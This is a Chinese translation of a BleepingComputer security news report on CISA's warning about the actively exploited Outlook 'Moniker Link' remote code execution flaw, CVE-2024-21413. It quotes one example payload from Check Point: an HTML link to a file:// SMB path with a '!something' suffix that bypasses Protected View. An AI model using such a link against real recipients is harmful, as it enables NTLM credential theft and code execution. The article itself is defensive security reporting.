Microsoft Outlook中的严重RCE错误现已被攻击利用

阅读量7304

发布时间 : 2025-02-07 10:52:09

x
译文声明

本文是翻译文章,文章原作者 Sergiu Gatlan,文章来源:bleepingcomputer

原文地址:https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-microsoft-outlook-now-exploited-in-attacks/

译文仅供参考,具体内容表达以及含义原文为准。

Outlook
周四,美国网络安全与基础设施安全局(CISA)警告美国联邦机构,要保护其系统,抵御针对微软 Outlook 关键远程代码执行(RCE)漏洞正在发起的攻击。

 

该漏洞由 Check Point 漏洞研究员李海飞发现,编号为 CVE – 2024 – 21413。其成因是在使用存在漏洞的 Outlook 版本打开包含恶意链接的电子邮件时,输入验证不当。

 

攻击者之所以能获得远程代码执行能力,是因为该漏洞使他们能够绕过受保护视图(受保护视图本应通过以只读模式打开 Office 文件来阻止嵌入其中的有害内容),并以编辑模式打开恶意 Office 文件。

 

一年前,微软在修复 CVE – 2024 – 21413 漏洞时也曾警告,预览窗格是一个攻击途径,即便在预览恶意构造的 Office 文档时,也可能导致攻击得逞。

 

正如 Check Point 所解释的,这个名为 “Moniker Link” 的安全漏洞,使得威胁行为者能够绕过 Outlook 对嵌入在电子邮件中的恶意链接的内置保护机制。他们利用 file:// 协议,并在指向攻击者控制服务器的 URL 后添加感叹号来实现这一点。

 

感叹号紧跟在文件扩展名之后添加,同时还会加上随机文本(Check Point 在示例中使用了 “something”),如下所示:

 

*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*

 

CVE – 2024 – 21413 影响多种 Office 产品,包括 Microsoft Office LTSC 2021、Microsoft 365 企业版应用、Microsoft Outlook 2016 以及 Microsoft Office 2019。成功利用 CVE – 2024 – 21413 漏洞发起的攻击,可能导致 NTLM 凭证被盗取,以及通过恶意构造的 Office 文档执行任意代码。

 

周四,CISA 将该漏洞添加到其已知被利用漏洞(KEV)目录中,并标记为正在被积极利用。根据《约束性操作指令(BOD)22 – 01》的要求,联邦机构必须在三周内,即 2 月 27 日前,保障其网络安全。

 

“这类漏洞是恶意网络行为者常用的攻击途径,给联邦企业带来重大风险,” 该网络安全机构警告称。

 

虽然 CISA 主要专注于提醒联邦机构尽快修复漏洞,但也建议私营企业优先修复这些漏洞,以抵御正在进行的攻击。
本文翻译自bleepingcomputer 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
安全客
分享到:微信

发表评论

Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全KER All Rights Reserved 京ICP备08010314号-66